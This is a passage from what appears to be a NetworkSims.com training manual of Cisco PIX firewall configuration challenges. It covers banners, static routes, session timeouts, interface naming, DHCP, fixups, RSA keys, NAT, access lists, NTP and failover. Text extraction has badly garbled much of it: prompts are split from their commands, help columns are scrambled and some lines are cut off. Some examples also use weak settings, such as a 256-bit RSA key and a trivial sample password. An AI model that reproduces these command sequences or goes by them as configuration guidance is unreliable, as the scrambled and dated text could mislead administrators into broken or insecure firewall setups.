telnet
(config)# help http
USAGE:
[no] http <local_ip> <mask> <if_name>
[no] http server enable
DESCRIPTION:
http
Configure HTTP server
SYNTAX:
<local_ip>
The ip address of the host and/or network authorized to

access the device HTTP server.
<mask>
The IP netmask to apply to <local_ip>.

Default is 255.255.255.255.
<if_name>
Network interface name.
see also:
password, aaa
(config)# http server enable
(config)# help banner
USAGE:
banner {exec | login | motd} <text>
no banner {exec | login | motd} [<text>]
show banner [{exec | login | motd}]
NetworkSims.com
443
clear banner
DESCRIPTION:
banner
Configure login/session banners
SYNTAX:
exec
Configures the system to display a banner before the enable prompt

is displayed.
login
Configures the system to display a banner before the password login

prompt when accessing the device using telnet.
motd
Configures the system to display a message-of-the-day banner.
<text>
A line of the message to be displayed. It will be added to the end

of an existing banner. The tokens $(domain) and $(hostname) will be
replaced with the host name and domain name.
(config)# banner motd hello
(config)# show banner
# show banner
Example (Ver 7.x)

As V6.0, but use show running banner instead of show banner.

Outline
This challenge involves the configuration of a static route, and some banners.
Objectives
Define a static route.

Define banners.
Example
(config)# help route
USAGE:
[no] route <if_name> <foreign_ip> <mask> <gateway>
[<metric>|tunneled]
clear configure route [<if_name>]
clear route [<if_name>]
show running-config route
show route [<if_name>]
DESCRIPTION:
NetworkSims.com
444
route
Enter a static route for an interface
SYNTAX:
<if_name>
The interface name, as specified by the 'nameif' command,

for which the route will apply
<foreign_ip>
The foreign network for this route, 0 means default
<mask>
The netmask for the destined foreign network <foreign_ip>
<gateway>
The address of the gateway by which <foreign_ip> is reached
<metric>
Distance metric for this route, default is 1
tunneled
Specifies route as the default tunnel gateway for VPN traffic.
see also:
rip, ping
(config)# route inside 10.0.0.0 ?

A.B.C.D The netmask for the destined foreign network
(config)# route inside 10.0.0.0 255.255.0.0 ?
Hostname or A.B.C.D The address of the gateway by which the foreign network
is reached.
(config)# route inside 10.0.0.0 255.255.0.0 206.59.124.10 ?
<1-255>
tunneled Enable the default tunnel gateway option, metric is set
to 255
(config)# route outside 10.0.0.0 255.255.0.0 206.59.124.10
(config)# show route
(config)# banner motd admin device
(config)# banner login personal device
(config)# banner exec main device
(config)# show domain-name
(config)# domain-name dumfries.eu
(config)# exit
# show route
S
10.0.0.0 255.255.0.0 [1/0] via 206.59.124.10, inside
C
192.168.0.1 255.255.255.0 is directly connected, glasgow
C
192.168.1.1 255.255.255.0 is directly connected, inside
C
192.168.2.1 255.255.255.0 is directly connected, dmz

Outline
This challenge involves the configuration of Telnet, SSH and Console timeouts.
Objectives
NetworkSims.com
445
Setup the hostname.

Define the Telnet timeout.
Define the SSH timeout.
Define the Console timeout.
Example
myPIX (config)# hostname arizona
arizona (config)# domain-name fife.nu
arizona (config)# show domain-name
myPIX (config)# help telnet
USAGE:
[no] telnet <local_ip> <mask> <if_name>
telnet timeout <number>
no telnet timeout [<number>]
DESCRIPTION:
telnet
Add telnet access to device console and set idle timeout
SYNTAX:
<local_ip>

login to the device
<mask>
<if_name>
<number>
Idle time in minutes after which a telnet session will be closed.

Default is 5 minutes.
see also:
ssh, password, aaa
arizona (config)# telnet timeout 8
arizona (config)# help ssh
USAGE:
[no] ssh <local_ip> <mask> <if_name>
[no] ssh timeout <number>
[no] ssh version 1|2
[no] ssh scopy enable
show ssh sessions [<client_ip>]
ssh disconnect <session_id>
DESCRIPTION:
ssh
Add SSH access to the Device console, set idle timeout, set
version supported, enable Secure Copy as an SSH application,
display a list of active SSH sessions, and terminate an SSH
session.
NetworkSims.com
446
SYNTAX:
<local_ip>
The IP address of the host and/or network authorized to

login to the Device.
<mask>
<if_name>
<number>
Idle time in minutes after which a SSH session will be closed.
<client_ip>
The IP address of the SSH client.
<session_id>
Session ID as displayed by the 'show ssh sessions' command.
see also:
telnet, password, enable, aaa
arizona (config)# ssh timeout 9
pixfirewall(config)# help console
USAGE:
[no] console timeout <number>
DESCRIPTION:
console
Set idle timeout for the serial console of the PIX
SYNTAX:
<number>
Valid range <0-60>. For <1..60>, console session will be

closed after idle time of <1..60> minutes. console
will never close for timeout <0>
see also:
telnet, ssh, passwd, aaa
arizona (config)# console timeout 9
arizona (config)# show telnet
arizona (config)# show ssh
arizona (config)# show console

Outline
This challenge involves the configuration of the security levels on the interfaces.
Objectives
Rename the interfaces, and define the security level on each interface.
Note: A port with the name of outside always has a security level of 0, while a port with the
name of inside always has a security level of 100.
NetworkSims.com
447
Example (Ver 6.x)

myPIX (config)# nameif e0 strathclyde security24
myPIX
(config)#
nameif
e1
myPIX (config)# nameif e2 rhodeisland security44
orkney
security61
Example (Ver 7.x)

> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif strathclyde
(config-if)# exit
(config)# int e1
(config-if)# nameif orkney
(config-if)# exit
(config)# int e2
(config-if)# nameif rhodeisland
(config-if)# exit
(config)# exit
# show running

Outline
This challenge involves the configuration of a shutdown on the interfaces.
Objectives
Define the names of the interfaces.

Shutdown each of the interfaces.
Example (6.x)
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
nameif e0 gretna security0

nameif e1 alabama security100
nameif e2 uranus security50
show nameif
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
interface e0 auto shut

show int
show int e0
NetworkSims.com
448
myPIX (config)# show int e1

myPIX (config)# show int e2
Example (Ver 7.x)

> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif gretna
(config-if)# exit
(config)# int e1
(config-if)# nameif alabama
(config-if)# exit
(config)# int e2
(config-if)# nameif uranus
(config-if)# exit
(config)# exit
# show running

Outline
This challenge involves the configuration of interfaces.
Objectives

Define the basic operation of the interfaces.
Example (Ver 6.x)

myPIX (config)# nameif e0 hawaii security0
myPIX (config)# nameif e1 alberta security100
myPIX (config)# nameif e2 orkney security50
myPIX (config)# interface e0 100full
Example (Ver 7.x)

> enable
NetworkSims.com
449
# nameif
# config t
(config)# help interface
USAGE:
interface <type> <port>
interface <type> <port>.<subif_number>
no interface <type> <port>.<subif_number>
show running-config [default] interface {<type> <port>[.<subif_number>]}
show interface {<type> <port>[.<subif_number>] | <if_name>}
[detail|stats|ip brief]
clear config interface {<type> <port>[.<subif_number>]}
clear interface {<type> <port>[.<subif_number>]}
DESCRIPTION:
interface
Set network interface parameters

show/clear interface counters
show brief summary of IP status and configuration
SYNTAX:
<type>
<port>
<subif_number>
<if_name>
Type of interface to be configured

Possible values: Ethernet, GigabitEthernet
Port number. Refer to the appropriate hardware manual for
port information
Subinterface number in the range 1 to 4,294,967,293
WARNING! Using 'no' on a Subinterface will remove the interface

from the system. Removing a Subinterface will delete all
configuration rules applied to the interface. Exercise caution when
using the 'no interface' command.
see also:
allocate-interface
(config)# int e0
(config-if)# help du
USAGE:
duplex auto|full|half
no duplex [auto|full|half]
DESCRIPTION:
duplex
Configure duplex operation
SYNTAX:
auto
full
half
Enable AUTO duplex configuration

Force full duplex operation
Force half-duplex operation
see also:
speed
(config-if)# help speed
USAGE:
NetworkSims.com
450
speed 10|100|1000|auto
no speed [10|100|1000|auto]
DESCRIPTION:
speed
Configure speed operation
SYNTAX:
Possible Ethernet values are:
10
100
auto
Enable AUTO speed configuration
Possible GigabitEthernet values are:
10
100
1000
auto
see also:
duplex
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# exit
# show running

Outline
Objectives
Enable the DHCP server.

Define DHCP parameters.
Show DHCP parameters.
Commands
NetworkSims.com
451
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
dhcpd enable inside

dhcpd dns 197.174.60.1
dhcpd address 197.174.60.2-197.174.60.22 inside
dhcpd wins 195.94.110.3
dhcpd lease 6
dhcpd domain athome.com
show dhcpd
Example
myPIX (config)# help dhcpd
USAGE:
dhcpd
dhcpd
dhcpd
dhcpd
dhcpd
dhcpd
dhcpd
address <ip1>[-<ip2>] <srv_ifc_name>

dns <dnsip1> [<dnsip2>]
wins <winsip1> [<winsip2>]
lease <lease_length>
ping_timeout <timeout>
domain <domain_name>
option <code> {ascii <string> | hex <hex_string> |
ip <address_1> [<address_2>]}
dhcpd enable <srv_ifc_name>
dhcpd auto_config <clnt_if_name>
show dhcpd [binding|statistics]
clear dhcpd
clear dhcpd [binding|statistics]
DESCRIPTION:
dhcpd
Configure DHCP Server
SYNTAX:
<ip1>
<ip2>
<dnsip>
<winsip>
<lease_length>
<timeout>
<domain_name>
<code>
<string>
<hex_string>
<address_1>
<address_2>
<srv_ifc_name>
Start address of the DHCP address pool

End address of the DHCP address pool
DNS server IP address
NetBios name server IP address
DHCP lease length in seconds
Ping timeout in milliseconds
DNS domain name
positive number representing the DHCP option code
ASCII string without whitespace
hexadecimal string without whitespace
IP address
IP address
Interface to enable DHCP server
<clnt_if_name>
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
Interface to retrieve DHCP client info

dhcpd enable inside
dhcpd wins 195.94.110.3
dhcpd lease 6
show dhcpd

NetworkSims.com
452
Outline
This challenge involves the configuration of fixups.
Objectives
Define fixup protocols.

Show fixup protocols.
Example (V6.x)
myPIX (config)# help fixup
USAGE:
[no] fixup protocol <prot> [<option>] <port>[-<port>]
DESCRIPTION:
fixup
Add or delete inspection service and feature defaults
SYNTAX:
<prot>
Protocol fixup to be enabled or disabled:

ctiqbe, dns [maximum-length <length>], ftp [strict], h323,
http, icmp [error], ils, mgcp, netbios, pptp, rsh, rtsp, sip,
skinny, smtp, snmp, sqlnet, sunrpc, sunrpc_udp, tftp, xdmcp
The fixup can be disabled via the no form of the command, e.g.,
no fixup protocol ftp strict 21
<option>
option to the inspection function
<port1>[-<port2>]
A range of ports to enable the fixup
myPIX (config)# fixup protocol ?
ctiqbe
dns
ftp
h323
http
icmp
ils
mgcp
netbios
pptp
rsh
NetworkSims.com
453
rtsp
sip
skinny
smtp
snmp
sqlnet
sunrpc
sunrpc_udp
tftp
xdmcp
myPIX (config)# fix pro http ?
WORD
Specify port(s) to enable fixup, <port1>[-<port2>]; default port(s):
ctiqbe--------------2748 ftp-------------------21
gtp------------2123,3386 h323-h225-----------1720
h323-ras-------1718-1719 http------------------80
ils------------------389 mgcp-----------2427,2727
netbios----------137-138 pptp----------------1723
rsh------------------514 rtsp-----------------554
sip-----------------5060 skinny--------------2000
smtp------------------25 snmp-----------------161
sqlnet--------------1521 sunrpc---------------111
sunrpc_udp-----------111 tftp------------------69
xdmcp----------------177
highs Ports 1024-65535
lows
Ports 1-1023
udp
Enable SIP over UDP application inspection
myPIX (config)# fixup protocol http 161
myPIX (config)# fixup protocol ftp 60
myPIX (config)# fixup protocol smtp 84
myPIX (config)# show fixup
Example (V7.x)
As V6.x but replace show fixup with:
myPIX # sh run fix
INFO: All 'fixup' commands have been converted to 'inspect' commands.
Please use 'show running-config service-policy' in conjunction
with 'show running-config policy-map' to view the new configuration.
myPIX # sh run service-p
service-policy global_policy global
myPIX # sh run policy-m
!
policy-map global_policy
class inspection_default
inspect dns maximum-length 512
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
NetworkSims.com
454
inspect
inspect
inspect
inspect
sip
netbios
tftp
http

Outline
This challenge involves the configuration of an encryption key.
Objectives

Define a user and a password.
Create an RSA key.
Show the RSA key.
Example
myPIX (config)# domain-name fife.nu
myPIX (config)# username fred password bert
myPIX (config)# help ca
USAGE:
crypto ca trustpoint <name>
no crypto ca trustpoint <name> [noconfirm]
crypto ca authenticate <name> [fingerprint <hex value>] [nointeractive]
crypto ca enroll <name> [noconfirm]
crypto ca import <name> certificate [nointeractive]
crypto ca import <name> pkcs12 <passphrase> [nointeractive]
crypto ca export <name> pkcs12 <passphrase>
crypto ca crl request <name>
crypto ca certificate map <sequence #>
crypto ca certificate chain <name>
clear configure crypto ca trustpoint
clear configure ca certificate map [<sequence #>]
clear crypto ca crls [<name>]
show crypto ca crls [<name>]
show crypto ca certificates [<name>]
show running-config [all] crypto ca
DESCRIPTION:
ca
Configure the Certification Authority.
SYNTAX:
trustpoint
authenticate
enroll
NetworkSims.com
Define a CA trustpoint
Get the CA certificate
Request a certificate from a CA
455
import
export
Import certificate or pkcs-12 data

Export a trustpoint configuration with all associated
keys and certificates in PKCS12 format
crl
For manual CRL polling, displaying, and erasing.
certificate map
Define certificate attributes map
certificate chain
Enter certificate chain configuration mode for the
indicated trustpoint
noconfirm
Suppress all interactive prompting
nointeractive
Execute the command in non-interactive mode
fingerprint
A key consisting of alphanumeric characters that is
used to authenticate the CA's certificate.
<name>
A nickname for the CA server.
<passphrase>
A required password that gives the CA administrator
some authentication when a user calls to ask for a
certificate to be revoked.
It can be up to 80 characters in length.
<sequence #>
Sequence to insert into certificate map entry
see also: key, crypto, ipsec, isakmp, tunnel-group
myPIX (config)# ca generate rsa key 256
myPIX (config)# show ca mypubkey rsa

Outline
This challenge involves the configuration of NAT.
Objectives
Define inside address range.

Define outside address range.
Show NAT parameters.
Show Global parameters.
Example (Ver 6.x)

myPIX (config)# help nat
USAGE:
[no] nat (<if_name>) <nat_id> <local_ip> [<mask>]
[dns] [outside]
[[tcp] <max_conns> [<emb_limit> [<norandomseq>]]]
[udp <udp_max_conns>]
[no] nat (if_name) <nat_id> access-list <acl-name>
[dns] [outside]
DESCRIPTION:
NetworkSims.com
456
nat
Associate a network with a pool of global IP addresses
SYNTAX:
<if_name>
The name of the network interface, as specified by 'nameif',

where the hosts/network designated by <local_ip> are accessed.
<nat_id>
The id of this group of hosts or networks. This id will

be referenced by the 'global' command to associate a global
pool with this command. The id '0' is reserved to indicate
(i) no address translation with the access-list option or
(ii) identity translation for the <real_ip> option. The
maximum nat_id with access-list is 65535. The maximum
nat_id without access-list is 2147483647.
<local_ip>
The hosts/networks in this <nat_id> group.

'0' indicates all networks or the default <nat_id> group
An IP address not found in a more explicit <nat_id> group
will default to a less explicit or '0', the least explicit
<mask>
dns
Use the created xlate to rewrite DNS address record.
tcp
TCP connections.
udp
UDP connections.
<max_conns>
The maximum number of simultaneous connections.

the <local_ip> hosts will each be allowed to use.
Idle connections are closed after the time specified by the
timeout conn command.
<emb_limit>
The maximum number of embryonic connections per host.

An embryonic connection is a connection request that has not
finished the necessary handshake between source and destination.
norandomseq
Disable TCP sequence number randomization.
<acl-name>
access-list name.
see also:
access-list, apply, global
myPIX (config)# nat ?

( Open parenthesis for the name of the network interface where
the hosts/network designated by the local IP address are accessed
myPIX (config)# nat (inside) ?
<0-2147483647> The <nat_id> of this group of hosts/networks. This <nat_id>
will be referenced by the global command to associate a
global pool with the local IP address. <nat_id> '0' is used
to indicate no address translation for local IP. The limit
is 65535 with access-lists
myPIX (config)# nat (inside) 1 ?
Hostname or A.B.C.D The hosts/networks in this <nat_id> group, '0' indicates
all networks or the default <nat_id> group
access-list
Specify access-list name after this keyword
myPIX (config)# nat (inside) 1 143.163.128.0 ?
NetworkSims.com
457

A.B.C.D IP netmask to apply to the local IP address
<cr>
myPIX (config)# nat (inside) 1 143.163.128.0 255.255.192.0
myPIX (config)# help global
USAGE:
[no] global (<ext_if_name>) <nat_id> {<global_ip>[-<global_ip>] [netmask
<global_mask>]} | interface
DESCRIPTION:
global
Specify, delete or view global address pools,

or designate a PAT(Port Address Translated) address
SYNTAX:
<(ext_if_name)> The external network interface name
<nat_id>
The id of the nat group(from the nat command) that

will draw from these global addresses
<global_ip>
The IP address, network or range of addresses that will

dynamically be translated on an as needed basis to hosts
in the nat group <nat_id>.
If this <ext_if_name> is connected to the Internet, the
<global_ip> should be registered with the Network Information
Center(NIC).
These addresses should also be reverse resolvable(in-addr.arpa)
on the outside DNS servers.
An address specified singly will be used as a PAT address.
When all of the non-PAT addresses of a global pool are in use
and there is a PAT address, subsequent hosts from the nat
group <nat_id> will share the single PAT address for up to
the number of licensed connections.
[netmask <global_mask>] The netmask of the global_ip.
interface
IP address of <ext_if_name> overloaded for PAT.
see also:
nat, alias, static
myPIX (config)# global ?

( Open parenthesis for the external network interface name
myPIX (config)# global (outside) 3 ?
WORD
Enter IP address or a range of IP addresses <start_ip>[-<end_ip>]
interface Specifies PAT using the IP address at the interface
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 ?
netmask Specify netmask for the IP address(es) after this keyword
<cr>
myPIX (config)# global (outside) 3 1.2.3.4 net ?
A.B.C.D Netmask for the IP address(es)
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 netmask 255.255.255.0
myPIX (config)# show nat
NetworkSims.com
458
myPIX (config)# show global
Example (Ver 7.x)

As Ver 6.0, but replace show nat and show global with:
myPIX (config)# show running nat
myPIX (config)# show running global

Outline
Objectives
Define the IP address and subnet mask of the interfaces.

Define a static mapping.
Example (Ver 6.x)

myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
ip address outside 84.120.11.5 255.128.0.0

ip address inside 10.10.0.1 255.128.0.0
ip address inf 172.16.0.1 255.128.0.0
show ip address
static (inside, outside) 84.120.11.15 211.204.152.13
show static
Example (Ver 7.x)

myPIX (config)# int e0
myPIX (config-if)# ip address 84.120.11.5 255.128.0.0
myPIX (config-if)# nameif outside
myPIX (config-if)# int e1
myPIX (config-if)# nameif inside
myPIX
myPIX
myPIX
myPIX
(config-if)#
(config-if)#
(config-if)#
(config-if)#
int e2
ip address 172.16.0.1 255.128.0.0
nameif inf2
exit
myPIX (config)# show ip address

myPIX (config)# help static
USAGE:
NetworkSims.com
459
[no] static [(real_ifc, mapped_ifc)]

{<mapped_ip>|interface}
{<real_ip> [netmask <mask>]} | {access-list <acl_name>}
[dns]
[[tcp] <max_conns> [<emb_lim> [<norandomseq> [nailed]]]]
[udp <max_conns>]
[no] static [(real_ifc, mapped_ifc)] {tcp|udp}
{<mapped_ip>|interface} <mapped_port>
{<real_ip> <real_port> [netmask <mask>]} |
{access-list <acl_name>}
[dns]
[udp <max_conns>]
DESCRIPTION:
static
Configure one-to-one address translation rule
SYNTAX:
<real_ifc>
Name of the network interface, as specified by 'nameif',

where the hosts or networks designated by <real_ip> or
sources in access-list are accessed.
<mapped_ifc>

where the <real_ip> or by the source in access-list are
translated into <mapped_ip>.
tcp
TCP static PAT.
udp
UDP static PAT.
<real_ip>
Address as configured at the actual host.
<real_port>
Port as viewed from the actual host.
<mapped_ip>
Masquerade address of the <real_ip> or of the source

address in access-list.
<mask>
The IP netmask to apply to <real_ip>.
<mapped_port>
Masquerade port of the <real_port> or of the source

port in access-list.
interface
Address taken from <mapped_ifc>.
<mapped_port>

<acl_name>
The access-list name with the source fields defining

the real address and real port, if applicable,
before translation.
dns
Rewrite DNS address record.
norandomseq
nailed
Allow TCP sessions for asymmetrically routed traffic
<max_conn>
The maximum number of simultaneous TCP connections that

each <real_ip> hosts will each be allowed to use. Idle
NetworkSims.com
460
connections are closed after the time specified by the

<emb_limit>
Maximum number of embryonic connections per host. An

embryonic connection is a connection request that has not
completed TCP 3-way handshake between source and
destination.
see also:
nat, global
myPIX (config)# static ?
( Open parenthesis for (<internal_if_name>,<external_if_name>) pair
where <internal_if_name> is the Internal or prenat interface and
<external_if_name> is the External or postnat interface
myPIX (config)# static (inside, outside) 84.120.11.15 211.204.152.13
myPIX (config)# show running static

Outline
This challenge involves the configuration of the activation key.
Objectives
Configure the activation key.

Show the activation key.
Example
myPIX # help activation-key
USAGE:
activation-key <activation-key-four-or-five-tuple>
show activation-key
DESCRIPTION:
activation-key
Modify activation-key.
SYNTAX:
<activation-key-four-or-five-tuple>
a four or five element hexadecimal string.
myPIX (config)# activation-key 1aa3aaab abfbcef1 133445ee ee56f6b0
myPIX (config)# show activation-key

NetworkSims.com
461
Outline
This challenge involves the configuration of an access-list.
Objectives
Define a named access-list.

Apply the access-list onto an interface.
Example
myPIX (config)# help access-l
USAGE:
Extended access list:
Use this to configure policy for IP traffic through the firewall
[no] access-list <id> [line <line_num>] [extended] {deny | permit}
{<protocol> | object-group <protocol_obj_grp_id>}
{host <sip> | <sip> <smask> |
object-group <network_obj_grp_id>}
[<operator> <port> [<port>] |
object-group <service_obj_grp_id>]
{<dip> <dmask> | object-group <network_obj_grp_id>}
[log [disable] | [<level>] | [default] [interval <secs>]]
[no] access-list <id> [line <line_num>] {deny | permit} icmp
[<icmp_type> | object-group <icmp_type_obj_grp_id>]
[no] access-list <id> webtype {deny|permit}
url {<url-string>|any} [log {disable | default | level}
[interval <seconds>]] [time-range <name>] [inactive]
[no] access-list <id> webtype {deny | permit>
tcp {host <host-addr> | <dest-addr> <dest-mask> | any}
[{{EQ | NEQ | LT | GT} <port> | RANGE <port> <port>}]
[log {disable | default | <level>} [interval <seconds>]]
[time-range <name> ] [ inactive ]
[no] access-list <id> [line <line_num>] remark <text>
access-list deny-flow-max <n>
access-list alert-interval <secs>
Standard access list:
Use this to configure policy having destination host or network only
[no] access-list <id> standard {deny|permit} {any | <ip> <mask> | host <ip>}
[no] access-list <id> remark <text>
Generic Commands:
NetworkSims.com
462
show access-list [<id>]

show running-config access-list
[alert-interval | deny-flow-max | <id>]
clear configure access-list [<id>]
clear access-list [<id> [counters]]
DESCRIPTION:
access-list
Add an access list
SYNTAX:
<id>
Access list number
<line_num>
Specify line number at which ACE should be entered
<webtype>
Use this to configure Web related policy
deny
Denies access if the conditions are matched.
permit
Permits access if the conditions are matched.
object-group
Keyword for specifying an object group.
obj_grp_id
Identifier of an existing object group.
remark
Specify a comment (remark)
<protocol>
The IP protocol name or number that will be open

udp is 17, tcp is 6, egp is 47, etc.
<sip>
Source IP address
<smask>
Mask to be applied to <sip>
<dip>
Destination IP address
<dmask>
Mask to be applied to <dip>
<operator>
Compares <sip> or <dip> ports. Possible operands

include lt (less than), gt (greater than), eq (equal), neq
(not equal), and range (inclusive range).
<port>
The decimal number or name of a TCP or UDP port
<text>
comment (remark)
log
Keyword for enabling log option on this ACL element.
disable
Keyword for disabling log option on this ACL element.
default
Keyword for set log option on this ACL element to

default values.
<level>
Optional syslog level (0-7); default level is 6.
interval
Keyword for specifying log interval.
<secs>
Optional log interval value (1-600); default is 300.
<icmp_type>
0 echo-reply,
NetworkSims.com
463
3 unreachable,
4 source-quench,
5 redirect,
6 alternate-address,
8 echo,
9 router-advertisement,
10 router-solicitation,
11 time-exceeded,
12 parameter-problem,
13 timestamp-request,
14 timestamp-reply,
15 information-request,
16 information-reply,
17 address-mask-request,
18 address-mask-reply,
31 conversion-error or
32 mobile-redirect
see also:
access-group, object-group
myPIX (config)# access-list uranus permit ip host 26.32.188.8 host 129.67.195.1
myPIX (config)# access-list uranus deny ip host 201.122.28.7 host 209.215.90.6
myPIX (config)# help access-g
USAGE:
[no]
override]
access-group
<access-list>
<in|out>
interface
<if_name>
[per-user-
DESCRIPTION:
access-group
traffic
Bind an extended access-list to an interface to filter inbound
SYNTAX:
<access-list>
Extended access list number
<in|out>
Inbound or Outbund access list
<if_name>
Name of the interface
per-user-override
Allow AAA downloaded per-user ACL to override
see also:
access-list, object-group
myPIX (config)# access-group uranus in interface outside

Outline
This challenge involves the configuration of object groups.
Objectives
NetworkSims.com
464
Define a network object-group.

Define a protocol object-group.
Define an ICMP object-group.
Example
myPIX (config)# help object-group
USAGE:
[no] object-group protocol | network | icmp-type <obj_grp_id>
[no] object-group service <obj_grp_id> tcp|udp|tcp-udp
show running-config [all] object-group
[protocol | service | icmp-type | network]
show running-config [all] object-group id <obj_grp_id>
clear configure object-group [protocol | service | icmp-type | network]
DESCRIPTION:
object-group
Create an object group for use in 'access-list'
SYNTAX:
protocol
network
service
icmp-type
Specifies
Specifies
Specifies
Specifies
a
a
a
a
group
group
group
group
of
of
of
of
protocols, such as TCP, etc

host or subnet IP addresses
TCP/UDP ports/services
ICMP types, such as echo
<obj_grp_id>
The identifier for the object group:

Must be 1 - 64 characters long, consisting of
letters, digits, '-', '_', or '.'.
tcp|udp|tcp-udp
Specifies the protocol type

tcp - services provided via
udp - services provided via
tcp-udp - services provided
show
Show object group(s) running config
clear
Remove existing object group(s) config
for
TCP
UDP
via
a service group;
only, such as ftp
only, such as snmp
both TCP and UDP
see also:
protocol-object, network-object,
port-object, icmp-object, group-object
myPIX (config)# object-group network montana
myPIX(config-network)# exit
myPIX (config)# object-group protocol newyork
myPIX(config-protocol)# exit
myPIX (config)# object-group icmp-type birmingham
myPIX(config-icmp-type)# exit
NetworkSims.com
465

Outline
This challenge involves the configuration of NTP.
Objectives

Define the details of the NTP servers.
Example (Ver 6.x)

> enable
myPIX # config t
myPIX (config)# nameif e0 columbia security0
myPIX (config)# nameif e2 florida security50
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
ntp server 73.35.212.5 source columbia

ntp server 70.51.127.73 source orkney
ntp server 69.49.18.8 source florida
show ntp
Example (Ver 7.x)

> enable
myPIX # config t
myPIX (config-if)# nameif columbia
myPIX (config-if)# security-level 0
myPIX (config-if)# exit
myPIX (config-if)# nameif orkney
myPIX (config-if)# speed 100
myPIX (config-if)# nameif florida
myPIX (config)# help ntp
USAGE:
ntp authenticate
no ntp authenticate
ntp authentication-key <number> md5 <value>
no ntp authentication-key <number> [md5 <value>]
ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
no ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
ntp trusted-key <number>
NetworkSims.com
466
no ntp trusted-key <number>

show ntp [associations [detail] | status]
DESCRIPTION:
ntp
Configure Network Time Protocol
SYNTAX:
<if_name>
<ip_address>
<number>
<value>
The
The
The
The
interface name of the time server.

ip address of the time server.
key number, range <1-4294967295>.
key value. Key length range is <1-32>.
see also:
clock
myPIX (config)# ntp server ?
Hostname or A.B.C.D IP address of peer
myPIX (config)# ntp server 73.35.212.5 ?
key
Configure peer authentication key
prefer Prefer this peer when possible
source Interface for source address
<cr>
pixfirewall(config)# ntp server 73.35.212.5 source ?
Current available interface(s):
florida
Name of interface Ethernet2
orkney
columbia
myPIX (config)# ntp server 73.35.212.5 source columbia
myPIX (config)# ntp server 70.51.127.73 source orkney
myPIX (config)# ntp server 69.49.18.8 source florida
myPIX (config)# exit
myPIX # show ntp status

Outline
This challenge involves the configuration of cable-based failover.
Objectives
Enable failover.
Define failover addresses.
Define failover poll time.
Example (V6.x)
NetworkSims.com
467
myPIX (config)# help fail

USAGE:
[no]
[no]
[no]
[no]
[no]
[no]
failover
failover polltime [unit] [msec] <time> [holdtime <seconds>]
failover polltime interface <seconds>
failover replication http
failover lan unit primary|secondary
failover interface ip <ifc_name> <ip_address> <mask> standby
<ip_address>
[no] failover interface-policy <n>[%]
[no] failover key <shared_key>
[no] failover lan interface <ifc_name> <phyifc>[.<subifc_id>]
[no] failover link <ifc_name> [<phyifc>[.<subifc_id>]]
[no] failover mac address <phyifc> <act_mac> <stn_mac>
[no] failover timeout <hh:mm:ss>
[no] failover lan enable
[no] failover active
failover reset
failover reload-standby
show failover [history|interface|state|statistics]
DESCRIPTION:
failover
Configure failover feature
SYNTAX:
active
Make this the active unit of a failover pair
reset
Force both units back to an unfailed state
<ifc_name>
Interface name
<ip_address>
IP Address
<mask>
IP Netmask
<n>[%]
Number/percent of monitored interfaces causing failover
[unit] [msec] <time>
Unit poll interval (500msec-999msec, 1-15 seconds)
holdtime <seconds>
Unit holdtime (3-45 seconds)
polltime interface <seconds>
Interface poll interval (3-15 seconds)
replication http
Enable HTTP (port 80) connection replication
lan unit {primary|secondary}
Specify the unit as primary or secondary
lan interface
Specify the failover interface parameters
link
Specify the stateful interface parameters
interface ip
Specify IP and mask for failover/stateful interface
interface-policy
Specify interface monitoring failure policy
key <shared_key>
Specify failover encryption shared key
show failover
Display failover runtime info
mac address
Specify virtual mac address for a physical interface
<phyifc>
Physical interface name
<subifc_id>
Sub-interface id
<act_mac> <stn_mac>
Active and standby mac address
timeout
Specify failover reconnect timeout value for ASR sessions
lan enable
Enable LAN-Based failover on PIX platform
myPIX (config)# failover active
myPIX (config)# failover ip address outside 157.202.212.2
myPIX (config)# failover ip address inside 73.105.56.11
myPIX (config)# failover ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
NetworkSims.com
468
myPIX (config)# show failover
Example (V7.x)
USAGE:
[no]
[no]
[no]
[no]
[no]
[no]
failover
<ip_address>
failover reset
DESCRIPTION:
failover
SYNTAX:
active
reset
<ifc_name>
Interface name
<ip_address>
IP Address
<mask>
IP Netmask
<n>[%]
holdtime <seconds>
replication http
lan interface
link
interface ip
interface-policy
key <shared_key>
show failover
mac address
<phyifc>
<subifc_id>
Sub-interface id
<act_mac> <stn_mac>
timeout
lan enable
myPIX (config)# failover int ?
NetworkSims.com
469

ip Configure the IP address and mask after this keyword
myPIX (config)# fai int ip ?
WORD Interface name
myPIX (config)# fai int ip ANY ?
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 ?
A.B.C.D Specify the mask for the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 ?
standby Configure the standby IP address after this keyword
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan ?
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan 157.202.212.3
?
<cr>
myPIX (config)# failover interface ip address outside 157.202.212.2
myPIX (config)# failover interface ip address inside 73.105.56.11
myPIX (config)# failover interface ip address inf2 166.209.230.11
myPIX (config)# show running failover

Outline
This challenge involves the configuration of failover for a primary device over a LAN.
Objectives
Enable failover.
Define failover parameters.
Example (V6.x)
NetworkSims.com
470

myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
failover poll 2
failover lan key mypix
failover lan unit primary
failover lan interface inf2
show failover
Example (V6
7.x)
